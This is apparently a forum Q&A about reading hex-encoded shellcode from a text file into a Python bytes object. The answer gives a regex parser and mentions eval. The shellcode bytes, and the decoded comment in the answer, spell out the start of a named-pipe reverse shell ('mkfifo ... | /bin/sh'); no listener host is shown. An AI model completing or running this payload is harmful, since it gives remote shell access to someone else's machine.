I have a text file containing shellcode looking like this :
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x73"
buf += b"\x35\x35\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x73\x61\x6b"
buf += b"\x6e\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e"
and I want to use automatically read this shellcode and attribute it to a variable in my python script to use it. I wrote a script looking like this
myfile = open("shellcode.txt","rt")
a = myfile.read()
myfile.close()
a = a.replace('buf += b"','')
a = a.replace('buf = b""','')
a = a.replace('"','')
a = a.replace(' ','')
a = a.replace('\n','')
buf =""
buf = str.encode(a)
to read the content of the file , strip it of characters that I don't need and only leave raw shellcode that I need and converts it to bytes.
I also tried with bytes , bytearray , buf += b"%s"%(a)
so whenever I print buf it outputs the shellcode as it is , but when I copy the content of shellcode.txt and paste it to the python script and print(buf) it prints the decoded version of the shellcode.
so If this method doesn't work , can I read the file and execute every line of it as if it were part of the script?
Here is a suggestion using regex to extract byte values. regex101 is a very good place to play with regexes and debug them.
import re
BYTE_REGEX = r"\\x([\w|\d]{2})" # extract bytes from string, without leading `\x`
# regex101.com is very good reference to analyse regex patterns
# retrieve text
with open('shellcode.txt', 'r') as f:
file_text = f.read()
buf_list = []
for byte in re.findall(BYTE_REGEX, file_text):
# scan string and treat all bytes one by one
buf_list.append(int(byte, base=16))
result = bytearray(buf_list)
print(result)
# mkfifo /tmp/s55 0</tmp/sakn | /bin/sh >
There is also mechanisms to execute python code given as text, see eval.